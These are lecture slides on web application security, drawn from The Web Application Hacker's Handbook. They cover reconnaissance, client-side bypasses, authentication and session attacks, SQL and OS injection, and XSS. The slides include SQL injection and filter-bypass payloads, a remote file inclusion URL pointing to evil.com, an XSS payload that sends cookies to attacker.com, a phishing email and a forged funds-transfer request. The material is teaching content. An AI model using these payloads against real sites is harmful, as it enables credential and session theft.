Hacker’s handbook: Mapping the
application
◼ Mapping the application: The first step in attacking an application
❑ to gather and examine some key information ➔ gain a better
understanding of what you are up against.
◼ Enumerating the application’s content and functionality➔
understand what it actually does and how it behaves.
❑ Much of this functionality will be easy to identify, but some may
be hidden away➔ need some guesswork and luck to discover.
◼ Once obtaining a catalogue of the application’s functionality ➔
closely examine every aspect of application behavior/core
security mechanisms, and the technologies being employed.
❑ ➔ Attackers can identify the key attack surface that the
application exposes: the most interesting areas to target ➔
further subsequent probing to find exploitable vulnerabilities

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 13
Mapping the application: the steps
◼ Analyzing the Application
◼ Enumerating Content and ❑ Identifying Entry Points for
Functionality User Input
❑ Web Spidering ❑ Identifying Server-Side
Technologies
❑ User-Directed Spidering ◼ Banner Grabbing
❑ Discovering Hidden Content ◼ HTTP Fingerprinting
◼ Brute-Force Techniques ◼ File Extensions
◼ Inference from Published ◼ Directory Names
Content
◼ Session Tokens
◼ Use of Public Information
◼ Third-Party Code
◼ Leveraging the Web Server Components
❑ Application Pages vs. ❑ Identifying Server-Side
Functional Paths Functionality
❑ Discovering Hidden ◼ Dissecting Requests
Parameters ◼ Extrapolating Application
Behavior
❑ Mapping the Attack Surface

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 14
HACKER HANDBOOK:
BYPASSING CLIENT-SIDE
CONTROLS

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 15
Hacker Handbook: Bypassing Client-Side
Controls
◼ The core security problem with web applications: clients can submit
arbitrary input
❑ Often web applications rely upon various kinds of measures
implemented on the client side to control the data to be submitted
◼ A fundamental security flaw: the user has full control over the client
and submitted data ➔ can bypass controls implemented on the client
◼ Two major ways in which client-side controls are used to restrict user
input
❑ An app may transmit data via the client component, using some
mechanism that is supposed to prevent user’s modifying data
❑ On gathering data entered by the user, an app may use client-side
controls which handle the contents of that data to be submitted
◼ using HTML form features, client-side scripts, or thick-client technologies.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 16
Bypassing Client-Side Controls
◼ False expectation and assumption
❑ “It is very common to see an application passing data to the client
in a form that is not directly visible or modifiable by the end user,
in the expectation that this data will be sent back to the server in
a subsequent request. Often, the application’s developers simply
assume that the transmission mechanism used will ensure that
the data transmitted via the client will not be modified along the
way.” – WebHackerHandbook
❑ the assumption that data transmitted via the client will not be
modified is FALSE!
◼ Why such a wrong practice happens so often:
❑ Convenience, easy-to-do for web developers
❑ Repeating known fact to servers: reducing per-session amount
stored at server ➔ better performance
◼ Also helps to deploy load-balanced cluster of servers

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 17
By-passing: Hidden Form Fields
◼ If a field is flagged as hidden, it is not
displayed on-screen.
❑ However, the field’s name and value are
stored within the form and sent back to
the application when the user submits the
form.
◼ But you can easily modify this hidden
field! ◼ The code behind this form is as
❑ Simply saving the source code for the follows:
HTML page, edit the value of the field <form action=”order.asp” method=”post”>
❑ reload the source into a browser, and <p>Product: Sony VAIO A217S</p>
click the Buy button. <p>Quantity: <input size=”2”
◼ But better use an intercepting proxy to name=”quantity”>
modify the desired data on the fly. <input name=”price” type=”hidden”
❑ Burp Proxy (part of Burp Suite) value=”1224.95”>
❑ WebScarab <input type=”submit” value=”Buy!”></p>
❑ Paros </form>
◼ The proxy is placed between your web ◼ Modify the hidden price and you
browser and the target application can buy for cheaper amount!
❑ It can intercept every request issued to
the application, and every response
received back, for both HTTP and HTTPS

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 18
Capturing User Data: HTML Form

◼ Forms can be used to impose restrictions i.e.


perform validation checks on the user-supplied
data.
➔ these client-side controls are used as a security
mechanism to defend itself against malicious input,

◼ However, the controls can usually be trivially


circumvented ➔ leaving the application
potentially vulnerable to attack.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 19
Length limits
◼ Eg. the browser prevent user from entering >3 digits in the
quantity field ➔ serve-side may assume that the quantity
parameter always <1000
<form action=”order.asp” method=”post”>
<p>Product: Sony VAIO A217S</p>
<p>Quantity: <input size=”2” maxlength=”3” name=”quantity”>
<input name=”price” type=”hidden” value=”1224.95”>
<input type=”submit” value=”Buy!”></p>
</form>

◼ But malicious user can easily defeat then take advantage of


❑ Submit data that is longer than this length but that is still valid in other
respects ➔ If the application accepts the overlong data➔ infer that
the length limit validation is not replicated on the server.
❑ Hacker may be able to leverage the defects in validation to exploit
SQL injection, cross-site scripting, or buffer overflows
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 20
Hacker Handbook: Bypassing Client-Side
Controls Capturing User Data: Thick- ◼
Client Components
◼ Transmitting Data via the ❑ Java Applets
Client 95 ❑ Decompiling Java Bytecode
❑ Hidden Form Fields ❑ Coping with Bytecode
❑ HTTP Cookies Obfuscation
❑ URL Parameters ❑ ActiveX Controls
❑ The Referer Header 1 ◼ Reverse Engineering
❑ Opaque Data ◼ Manipulating Exported Functions
◼ Fixing Inputs Processed by
❑ The ASP.NET ViewState Controls
◼ Capturing User Data: HTML ◼ Decompiling Managed Code
Forms ◼ Shockwave Flash Objects
❑ Length Limits ◼ Handling Client-Side Data
❑ Script-Based Validation Securely
❑ Disabled Elements ❑ Transmitting Data via the Client
❑ Validating Client-Generated Data
❑ Logging and Alerting

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 21
Capturing User Data: Thick-Client
Components
◼ Another way for capturing, validating, and
submitting user data
❑ The technologies most likely to encounter: Java
applets, ActiveX controls, and Shockwave Flash
objects

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 22
Java
applets ◼ the applet tag instructs the browser to load a Java applet from the
specified URL and instantiate it with the name TheApplet
◼ the user clicks the Play button, a JavaScript routine executes that
invokes the getScore method of the applet
<script> ◼ This is when the actual game play takes place, after which the score is
function play() displayed in an alert dialog.
{
alert(“you scored “ + TheApplet.getScore());
The script then invokes the getObsScore
document.location = “submitScore.jsp?score=” +
method of the applet, and submits the
TheApplet.getObsScore() + “&name=” +
returned value as a parameter to the
document.playForm.yourName.value;
submitScore.jsp URL, together with the
}
name entered by the user
</script>
<form name=playForm>
<p>Enter name: <input type=”text” name=”yourName” value=”“></p>
<input type=”button” value=”Play” onclick=JavaScript:play()>
</form>
<applet code=”https://wahh-game.com/JavaGame.class”
id=”TheApplet”></applet>

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 23
Obfuscation & decompiling
◼ Example: playing the game results in a dialog like
this, then followed by a request for a URL with this
form:
❑ https://wahh-game.com/submitScore.jsp?score=
c1cc3139323c3e4544464d51515352585a61606a6b&name
=daf
◼ Obfuscation:
◼ The long string that is returned by the getObsScore method, and
submitted in the score parameter.
◼ Want to cheat the game? Submit an arbitrary high score? ➔ need
know how to correctly obfuscate your chosen score, i.e. decoded in the
way by the server. ➔ Reverse engineering is possible but difficult!
◼ Decompiling Java bytecode: decompile the applet to obtain its source
code. Java bytecode can be decompiled to recover its original source code

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 24
Handling Client-Side Data Securely
◼ The core security problem with web applications arises because client-
side components and user input are outside of the server’s direct
control.
❑ The client, and all of the data received from it, is inherently untrustworthy.
◼ Transmitting Data via the Client
❑ applications should avoid transmitting critical data (e.g. product prices and
discount rates) via the client.
❑ Often, it is possible to hold such data on the server, and reference it
directly from server-side logic
◼ Validating Client-Generated Data: Data generated on the client and
transmitted to the server cannot in principle be validated securely on the client
❑ Lightweight controls like HTML form fields JavaScript can be trivially circumvented
❑ Thick-client components merely slow down an attacker for a short period
❑ Obfuscated client-side code provides additional obstacles, but still could be
overcame by a determined attacker

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 25
HACKER HANDBOOK:
ATTACKING
AUTHENTICATION

26
Attacking Authentication

◼ Authentication Technologies
❑ HTML-forms
❑ Multi-factor mechanisms (e.g. passwords and
physical tokens)
❑ Client SSL certificates and smartcards
❑ Windows-integrated authentication
❑ Kerberos
❑ Authentication services

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 27
Design flaws
◼ Poorly chosen passwords
❑ Attack: discover password policies by trying registering several
accounts then changing passwords
❑ Brute-Forcible login
◼ the allowed number of login attempts can be found in cookies
◼ Poorly chosen usernames
❑ Could be Email addresses, and other easily guessable ones
◼ Verbose Failure Messages
❑ Can be used to guess username: different messages depending on
if username /password is invalid (difference might be small)
❑ Another factor is difference in timing (delay in respose from server)
➔ Hack steps:
❑ Monitor your own login session with tools as wireshark/web proxy
◼ Generate a list of (u-name, password) then automate a brute-force attack
❑ If login form is loaded using http➔ vulnerable to man-in-the-middle
attack
◼ even if the authentication itself is protected by HTTPS
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 28
Design flaws
◼ “Forgotten password” functionality
❑ Often not well tested
❑ Secondary challenges are much easier to guess
◼ User-set secret question/Password hints set by user:
usually easy ones, could be trivial
◼ Authentication information sent to an email address
specified in password recovery procedure
◼ “Remember me” functionality
❑ Insecure implementation
◼ E.g. RememberUser=“PeterGell”
◼ Simple persistent cookie
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 29
Design flaws
◼ User impersonation functionality
❑ Used by system to allow administrator to impersonate normal
users
❑ Could be implemented as a “hidden” function such as
/admin/ImpersonateUser.php
❑ Could trust user controllable data such as a cookie
◼ Non-unique user names (rare but observed in
the wild)
❑ Application might or might not enforce different passwords
❑ Hack steps: register multiple names with the same user name
with different passwords
❑ Monitor for behavior differences when the password is already
used
❑ This allows attacks on frequent usernames

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 30
Attacking Authentication

◼ Predictable Initial Password


❑ Commonly known passwords:
◼ Common practice in schools is to use the student id numbers
❑ Hack steps: Try to obtain several passwords in quick
succession to see whether they change in a predictable
way
◼ Insecure Distribution of Credentials
❑ Typically distributed out of band such as email
❑ If there is no requirement to change passwords➔ capturing
messages / message archives yields valid credentials

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 31
Attacking Authentication

◼ Logic flaws in multistage login mechanisms


❑ Mechanisms provide additional security by adding
additional checks
❑ Logic flaws are simpler to make: attack the logics of
control flow and data consistence between stages
◼ Hacking steps:
❑ Monitor successful login
❑ Identify distinct stages and the data requested
❑ Repeat the login process with various malformed requests
❑ Check whether all demanded information is actually processed
❑ Check for client-side data that might reflect successful passing
through a stage

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 32
Attacking Authentication

◼ Insecure Storage of Credentials


❑ Often stored in unsecured form in a database
❑ Targets of sql injection attacks or authentication
weaknesses

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 33
ATTACKING SESSION
MANAGEMENT

34
Session Management

◼ The session management mechanism is a fundamental


security component in the majority of web applications,
which enables the application
❑ to uniquely identify a given user across a number of different requests
❑ to handle the data that it accumulates about the state of that user’s
interaction with the application.
◼ If an attacker can break an application’s session
management
❑ she can effectively bypass its authentication controls
❑ masquerade as other users without knowing their credentials.

If an attacker compromises an administrative user in this way, then the


attacker can own the entire application.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 35
Why Session
◼ Why session
❑ Users do not want to have to reenter their password on every single
page of the application
◼ Implementing sessions
❑ Issue each user with a unique session token or identifier
❑ On each subsequent request to the application, the user resubmits this
token, enabling the application to determine which sequence of earlier
requests the current request relates to.
❑ HTTP cookies as the mechanism for passing these session tokens between
server and client
◼ E.g. the server’s first response to a new client contains an HTTP header
Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55
◼ and subsequent requests from the client contain the header:
Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 36
Session Management and Weakness
◼ Sessions need to store state
◼ Performance dictates to store state at client
❑ Cookies
❑ Hidden forms
◼ Asp.net view state (Not a session)
❑ Fat URL
❑ HTTP authentication (Not a session)
❑ All or combinations, which might vary within a different state
◼ Weaknesses usually come from
❑ Weak generation of session tokens
❑ Weak handling of session tokens
◼ Hacker needs to find used session token
❑ Find session dependent states and disfigure token
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 37
Weaknesses in Session Token Generation
◼ Meaningful tokens
❑ Might be encoded in hex, base-64, …
❑ Might be trivially encrypted (e.g. with XOR encryption)
❑ Leak session data information
❑ If not cryptographically protected by a signature, allow simple
alteration
◼ Hacking Steps:
❑ Obtain a single token and systematically alter it, observing the effect
on the interaction with the website
❑ Log-in as several users, at different times, … to record and analyze
differences in tokens
❑ Analyze tokens for correlation related to state information such as
user names
❑ Test reverse engineering results by accessing site with artificially
created tokens.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 38
Predictable tokens

◼ Most brazen weakness: sequential session ids


◼ Typical weaknesses:
❑ Concealed sequences
◼ Such as adding a constant to the previous value
❑ Time dependencies
◼ Such as using Unix, Windows NT time
❑ Weak random number generation
◼ E.g. Use NIST FIPS-140-2 statistical tests to discover
◼ Use hacker tools such as Stompy

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 39
Weaknesses in Session Token Handling

◼ Disclosure of Tokens on the Network


❑ not all interactions are protected by HTTPS
◼ Common scenario: Login, account update uses https, the rest or part
(help pages) of the site not.
◼ Use of http for pre-authenticated areas of the site such as front page,
which might issue a token
❑ Cookies can be protected by the “secure” flag
◼ Disclosure of Tokens in
❑ Logs of User browser/Web server/corporate or ISP proxy
servers/reverse proxies
❑ Referer logs of any servers that user visit by following off-site links
◼ Example: Firefox 2.? Includes referer header provided that the off-site is
also https. This exposes data in URLs

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 40
Weaknesses in Session Token Handling

◼ Multiple valid tokens concurrently assigned to the same


user / session
❑ Existence of multiple tokens is an indication for a security breach
◼ Of course, user could have abandoned and restarted a session

◼ “Static Tokens”
❑ Same token reissued to user every time
◼ A poorly implemented “remember me” feature

◼ Other logic defects:


❑ A token consisting of a user name, a good randomized string that
never used / verified the random part, …

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 41
Weaknesses in Session Token Handling

◼ Client exposure to Token Hijacking


❑ XSS attacks query routinely user’s cookies
❑ Session Hijacking:
◼ Session Fixation Vulnerability:
❑ Attacker feeds token to the user, waits for them to login, then
hijacks the session
◼ Cross-Site Request Forgeries
❑ Attacker crafts request to application
❑ Incites user to send request
❑ Relies on token being sent to site

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 42
Securing Session Management

◼ Generate Strong Tokens


❑ Uses crypto
❑ Uses cryptogr. strong random number generator
◼ Protect Tokens throughout their Lifecycle
❑ Transmit tokens only over https
❑ Do not use URL to transmit session tokens
❑ Implement logout functionality
❑ Implement session expiration
❑ Prevent concurrent logins
❑ Beware of / secure administrative functionality to view
session tokens
❑ Beware of errors in setting cookie domains and paths
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 43
Securing Session Management
◼ Prevent Cross-Site Scripting vulnerabilities
◼ Check tokens submitted
◼ If warranted, require two-step confirmation and / or
reauthentication to limit effects of cross-site request forgeries
❑ Consider per-page tokens

◼ Create a fresh session after successful authentication to limit


effects of session fixation attacks
❑ This is particularly difficult, if sensitive information is submitted,
but user does not authenticate
◼ Log, Monitor, Alert
◼ Implement reactive session termination

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 44
CODE INJECTION

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 45
Code Injection

◼ Hacking steps:
❑ Supply unexpected syntax to cause problems
❑ Identify any anomalies in the application response
❑ Examine any error messages
❑ Systematically modify input that causes
anomalous behavior to form and verify
hypotheses on the behavior of the system
❑ Try safe commands to prove existence of injection
flaw
❑ Exploit the flaw
Code Injection Into SQL
◼ Gain knowledge of SQL
❑ Install same database as used by application on local server to test SQL
commands
❑ Consult manuals on error messages
◼ Detection:
❑ Cause an error condition:
◼ String Data
❑ Submit a single quotation mark
❑ Submit two single quotation marks
❑ Use SQL concatenation characters
▪ ‘ | | ‘ FOO (oracle)
▪ ‘ + ‘ FOO (MS-SQL)
▪ ‘ ‘ FOO (No space between quotation marks) (MySQL)
◼ Numeric Data
❑ Replace numeric value with arithmetic (Instead of 5, submit 2+3)
❑ Use sql-specific keywords
▪ 67-ASCII(‘A’) is equivalent to 2 in SQL
❑ Beware of special meaning of characters in http such as ‘&’, ‘=‘, …
Detection
◼ Cause an error condition:
❑ Select / Insert Statements
◼ Entry point is usually ‘where’ clause, but ‘order by’ etc.
might also be injected
◼ Example: admin’ or 1==1
❑ Example injections into user name field for injection
into insert, where we do not know the number of
parameters:
◼ foo ’)--
◼ foo ‘ , 1) –
◼ foo ‘ , 1 , 1) –
◼ foo ‘ , 1 , 1 , 1) –
❑ Here we rely on 1 being cast into a string.
Union operator
◼ Usual:
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’

◼ Fake by inserting the input below


Wiley’ UNION SELECT username, password, uid FROM users--
That is to obtain
SELECT author, title, year FROM books WHERE publisher = ‘Wiley’
Union SELECT username, password, uid FROM users--’

◼ Should look at error messages in order to


reformulate the string more successfully
❑ ‘ UNION SELECT NULL- -’
❑ ‘ UNION SELECT NULL, NULL--
❑ ‘UNION SELECT NULL, NULL, NULL --
Union operator

◼ Find out how many rows are in the table:


❑ ORDER BY 1 --
❑ ORDER BY 2 --
❑ ORDER BY 3 –
◼ Find out which columns have the string data
type
❑ UNION SELECT ‘a’, NULL, NULL--
❑ UNION SELECT NULL, ‘a’, NULL--
❑ UNION SELECT NULL, NULL, ‘a’--
Fingerprinting the database
◼ Why fingerprinting:
❑ Important because of differences in SQL supported
◼ E.g.: Oracle SQL requires a from clause in all selects
◼ How
❑ Obtain version string of database from
◼ UNION SELECT banner,NULL,NULL from v$version
❑ Try different ways of concatenation
◼ Oracle: ‘Tho’||’mas’
◼ MS-SQL: ‘Tho’+’mas’
◼ MySQL: ‘Tho’ ‘mas’ (with space between quotes)
❑ Different numbering formats
◼ Oracle: BITAND(1,1)-BITAND(1,1)
◼ MS-SQL: @@PACK-RECEIVED-@@PACK_RECEIVED
◼ MySQL: CONNECTION_ID() - CONNECTION_ID()
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
‘ having 1=1 –
❑ Generates error message

◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)


[ODBC SQL Server Driver] [SQL Server] Column ‘users.ID’ is invalid in the
select list because it is not contained in an aggregate function and there is no
GROUP BY clause

◼ Inject
‘ group by users.ID having 1=1 –
❑ Generates error message
◼ Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’ (Microsoft)
[ODBC SQL Server Driver] [SQL Server] Column ‘users.username’ is invalid
in the select list because it is not contained in an aggregate function and there
is no GROUP BY clause
MS-SQL: Exploiting ODBC Error
Messages
◼ Inject
◼ ‘ group by users.ID, users.username, users.password,
users.privs having 1=1 --
❑ Generates no error message
❑ No proceed injecting union statements to find data
types for each column
❑ Inject
◼ ‘ union select sum(username) from users--’
By-passing filters

◼ Avoiding blocked characters


❑ The single quotation mark is not required for
injecting into a numeric data field
❑ If the comment character is blocked, craft injection
so that it does not break the surrounding query
◼ ‘ or 1 = 1 -- ➔ ‘ or ‘a’ = ‘ a
❑ MS-SQL does not need semicolons to separate
several commands in a batch
By-passing filters
◼ Circumventing simple validation
❑ If a simple blacklist is used, attack canonicalization and validation.
❑ E.g. instead of select, try
◼ SeLeCt
◼ SELSELECTECT
◼ %53%45%4c%45%43%54
◼ %2553%2545%254c%2545%2543%2554

◼ Use inline comments


❑ SEL/*foo*/ECT (valid in MySQL)
◼ Manipulate blocked strings
❑ ‘adm’| |’in’ (valid in Oracle)
◼ Use dynamic execution
❑ exec(‘select * from users’) works in MS-SQL
By-passing filters
◼ Exploit defective filters
❑ Example: Site defends by escaping any single
quotation mark
◼ I.e.: Replace ‘ with ‘’
❑ Assume that user field is limited to 20 characters
◼ Inject
❑ aaaaaaaaaaaaaaaaaaa’
◼ Application replaces this with
❑ aaaaaaaaaaaaaaaaaaa’’
◼ Passes it on to database, which shortens it to 20
characters, removing the final single quotation mark
◼ Therefore, inject
❑ aaaaaaaaaaaaaaaaaaa’ or 1=1 --
Second Order SQL Injection

◼ The result of an SQL statement is posted in


another sql statement
❑ Canonicalization is now much more difficult
Code Injection: OS Injection

◼ Two types:
❑ Characters ; | & newline are used to batch
multiple commands
❑ Backtick character ` used to encapsulate
speparate commands within a data item
◼ Use time delay errors
❑ Use ‘ping’ to the loop-back device
◼ | | ping -I 30 127.0.0.1 ; x | | ping -n 30 127.0.0.1 &
❑ works for both windows and linux in the absence
of filtering
OS Injection
◼ Dynamic execution in php
❑ uses eval
◼ Dynamic execution in asp
❑ uses evaluate
◼ Hacking steps to find injection attack:
❑ Try
◼ ;echo%2011111111
◼ echo%201111111
◼ response.write%201111111
◼ :response.write%201111111
❑ Look for a return of 1111111 or an error message
OS Injection

◼ Remote file injection


❑ PHP include accepts a remote file path
◼ Example Fault:
https://bobadilla.engr.scu.edu/main.php?Country=FRG
is processed as
❑ $country = $_GET[‘Country’];
❑ include( $country. ‘.php’ );
❑ which loads file: FRG.php
❑ Attacker injects
▪ https://bobadilla.engr.scu.edu/main.php?Country=http://evil.co
m/backdoor
◼ Found by putting attacker’s resources, or non-
existing IP, or static resource on victim’s site, …
Code Injection: OS Injection

◼ Soap Injection
◼ XPath injection
◼ SMTP injection
◼ LDAP injection
Attacking other users: XSS

◼ XSS attacks
❑ Vulnerability has wide range of consequences,
from pretty harmless to complete loss of
ownership of a website
ATTACKING OTHER USERS:
CROSS-SITE SCRIPTING (XSS)

Network Security by Van K Nguyen 63


Sep 2010 Hanoi University of Technology 63
Reflected XSS
◼ User-input is reflected to web page
❑ Common vulnerability is reflection of input for an
error message
◼ Exploitation:
Attacker hijacks user’s session

Server
User logs
responds
in with
User requests attacker’s
attacker’s Javascript
URL

User’s browser
Attacker feeds sends
craftedsession
URL
token to attacker
Reflected XSS
◼ Exploit:
1. User logs on as normal and obtains a session cookie
2. Attacker feeds a URL to the user
◼ https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=n
ew+Image;+i.src=“http://attacker.com/”%2bddocument.cookie;</scr
ipt>
3. The user requests from the application the URL fed to them by
the attacker
4. The server responds to the user’s request; the answer contains
the javascript
5. User browser receives and executes the javascript
◼ var I = new Image; i.src=http://attacker.com/+document.cookie
6. Code causes the user’s browser to make a request to
attacker.com which contains the current session token
7. Attacker monitors requests to attacker.com and captures the
token in order to be able to perform arbitrary actions as the
user
Reflected XSS

◼ Same Origin Policy: Cookies are only returned to the


site that set them.
❑ Same Origin Policy:
◼ Page residing in one domain can cause an arbitrary request to
be made to another domain.
◼ Page residing in one domain can load a script from another
domain and execute it in its own context
◼ A page residing in one domain cannot read or modify cookies
(or other DOM data) belonging to another domain
◼ For browser, the attacker’s javascript came from the
site
❑ It is executed within the context of the site
How to feed a tricky URL

From: Thomas Schwarz <tschwarz@bobadilla.engr.scu.edu>


To: John Doe
Subject: Complete online course feed-back form
Dear Valued Student
Please fill out the following online course feed-back form. Your grades
will not be released to the registrar without having completed this form.
Please go to my course website using your usual bookmark and then
click on the following link:
https://bobadilla.engr.scu.edu/%65%72%72%6f%72?message%3d%3c%
73%63%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c=“ht%74%70%3a%2f
Stored XSS Vulnerability

Attacker hijacks user’s session


User logs
Server in andwith
responds views
Attacker’s Javascript
attackers
attacker’s question
Javascript Attacker submits question
executes in user’s containing malicious
browser Javascript

User’s browser sends session


token to attacker
DOM-based XSS

◼ A user requests a crafter URL supplied by the


attacker and containing embedded Javascript
◼ The server’s response does not contain the
attacker’s script in any form
◼ When the user’s browser processes this
response, the script is nevertheless
executed.
The case of MySpace, 2005
◼ User Samy circumvented anti-XSS filters installed to
prevent users from placing JavaScript in their user profile
pages
◼ Script executed whenever user saw Samy’s page
❑ Added Samy into “friends” list
❑ Copied itself into the victim’s page
◼ MySpace had to take the application offline, remove
malicious script from the profiles of their users, and fix
the defect
◼ Samy was forced to pay restitution and carry out three
months of community service
XSS Payloads
◼ Virtual Defacement
❑ Content of host is not affected, but loaded from
other sites
◼ Injecting Trojan Functionality
❑ “Google is moving to a pay to play model” proof of
concept created by Jim Ley, 2004
◼ Inducing User Actions
❑ Use payload script to perform actions
◼ Exploit Any Trust Relationships
XSS Payloads
Other payloads for XSS
◼ Malicious web site succeeded in the past to:
❑ Log Keystrokes
❑ Capture Clipboard Contents
❑ Steal History and Search Queries
❑ Enumerate Currently Used Applications
❑ Port Scan the Local Network
❑ Attack Other Network Hosts
◼ <img src=http://192.168.1.1/hm_icon.gif”
onerror=“notNetgear()”
◼ This checks for the existence of a unique image that is
present if a Netgear DSL router is present
◼ And XSS can deliver those things, too
Delivery Modes
◼ Reflected and DOM-based XSS attacks
❑ Use forged email to target users
❑ Use text messages
❑ Use a “third party” web site to generate requests that
trigger XSS flaws.
◼ This is successful if the user is logged into the vulnerable
site and visits the “third party” web site at the same time.
◼ Attackers can pay for banner ads that link to a URL
containing an XSS payload for a vulnerable application
❑ Use the “tell a friend” or “tell administrator” functionality
in order to generate emails with arbitrary contents and
recipients
Delivery Modes

◼ Stored XSS attacks


❑ Look for user controllable data that is displayed:
◼ Personal information fields
◼ Names of documents, uploaded files, …
◼ Feedback or questions for admins
◼ Messages, comments, questions, …
◼ Anything that is recorded in application logs and
displayed in a browser to administrators:
❑ URLs, usernames, referer fields, user-agent field contents,

Finding Vulnerabilities
◼ Standard proof-of-concept attack strings
“><script>alert(document.cookie)</script>
❑ String is submitted as every parameter to every page of the
application
◼ Rudimentary black-list filters
❑ Look for expressions like “<script>”, …
❑ Remove or encode expression, or block request altogether
❑ Counterattack:
◼ Use exploits without the <script> or even “ < > / characters
❑ Examples:
◼ “><script > alert(document.cookie)</script >
◼ “><ScRiPt>alertalert(document.cookie)</ScRiPt >
◼ “%3e%3cscript%3ealert(document.cookie)%3c/script%3e
◼ “><scr<script>ipt> alert(document.cookie)</scr</script>ipt>
◼ %00”>script>alert(document.cookie)</script>
Finding Reflected XSS Vulnerabilities
◼ Look for input string that is reflected back to user
❑ should be unique and easily searchable: “Crubbardtestoin”
❑ Submit test string as every parameter using every method, including
HTTP headers
◼ Review the HTML source code to identify the location of the
test string
◼ Change the test string to test for attack possibilities
❑ XSS bullets at ha.ckers.org
❑ Signature based filters (e.g. ASP.NET anti-XSS filters) will mangle
reflection for simple attack input, but
◼ Often overlook: whitespaces before or after tags, capitalized letters, only
match opened and closed tags,
❑ Data Sanitization
◼ Can remove certain expressions altogether, but then no longer check for
further vulnerabilities: <scr<script>ipt>
◼ Can be beaten by inserting NULL characters
◼ Escapes quotation characters with a backslash
❑ Use length filters that can be avoided by contracting JavaScripts
HTTP Only Cookies

◼ An application sets a cookie as http only


❑ Set-Cookie: SessId=124987389346541029:
HttpOnly
◼ Supporting browsers will not allow client side
scripts to access the cookie
◼ This dismantles one of the methods for
session hijacking
Cross-Site Tracing
◼ Enables client-side scripts to circumvent the
HttpOnly protection
❑ Uses HTTP TRACE method
◼ used for diagnostics
◼ enabled by many web servers by default
❑ If server receives a request using the TRACE method,
➔ respond with a message whose body contains exactly the
same text of the trace request received by the server.
◼ Purpose is to allow seeing changes made by proxies, etc.
❑ Browsers submit all cookies in HTTP requests
including requests that are made with TRACE and
including cookies that are HttpOnly
Attacking other users: XSS
◼ Redirection Attacks
❑ Applications takes user-controllable input for redirection
◼ Circumvention of typical protection mechanisms
❑ Application checks whether user-supplied string starts with http:// and
then blocks the redirection or removes http://
◼ Tricks of the trade:
❑ Capitalize some of the letters in http
❑ Start with a null character (%00)
❑ Use a leading space
❑ Use double http
◼ Similar tricks when application checks whether url is in the same site as
application
❑ Application adds prefix http://bobadilla.engr.scu.edu to user input
◼ This is vulnerable if the prefix does not end with a ‘/’ character
HTTP Header Injection

◼ Application inserts user-controllable data in


an HTTP header returned by application
❑ Can be used to inject cookies
❑ Can be used to poison proxy server cache
Attacking other users: XSS

◼ Request Forgery - Session Riding


◼ On-Site Request Forgery OSRF
❑ Payload for XSS
❑ Vulnerability profile: Site allows users to submit
items viewed by others, but XSS might not be
feasible.
Example
◼ Message Board Application
◼ Messages are submitted with a request such as
POST /submit.php
Host: bobadilla.engr.scu.edu
Content-Length: 41
type=question&name=foo&message=bar
◼ Request results in
<tr> <td><img src=“/images/question.gif”></td>
<td>foo</td>
<td>bar</td></tr>
◼ Now change your request type to
type=../admin/newUser.php?username=foo&password=bar&role=admin#
◼ Request results in
<tr> <td><img src=“/images/
=../admin/newUser.php?username=foo&password=bar&role=admin#.gif”></td>
<td> </td>
<td> </td></tr>
◼ When an administrator is induced to issue this crafter request, the action is
performed
Attacking other users: XSS
◼ XSS Request Forgery (XSRF)
◼ Attacker creates website
❑ User’s browser submits a request directly to a vulnerable
application
❑ HTTP cookies are used to transmit session tokens.

◼ 2004 (D. Amstrong): visitors make automatic bids to an ebay


auction
◼ Example:
❑ Find a function that performs some interesting action on behalf of
user and that has simple request parameters
POST TransferFunds.asp HTTP/1.1
Host: bobadilla.engr.scu.edu
FromAccount=current&ToSortCode=123456&ToAccountNumber=1234567&Amount=1000.
00&When=Now
❑ Create an HTML page that issues the request without any user
interaction
▪ For GET request, use an <img> tag with src set to the vulnerable URL
▪ For POST request, use a form with hidden forms
Network Security
Van K Nguyen - HUT

Web application security


Agenda

◼ Web application (in)security


◼ From hacker’s point of view
◼ Common Attack: Code injection
◼ Common Attack: Cross-site scripting

Material in this 2-session lecture is based on


this book: “The Web Application Hacker's
Handbook: Discovering and Exploiting Security
Flaws” by Dafydd Stuttard and Marcus Pinto [Wiley
(October 22, 2007) ] – below we call it by
WebHackerHandbook
Web application security

◼ The evolution of Web applications


All kinds of things we could do online
❑ Shopping (Amazon)
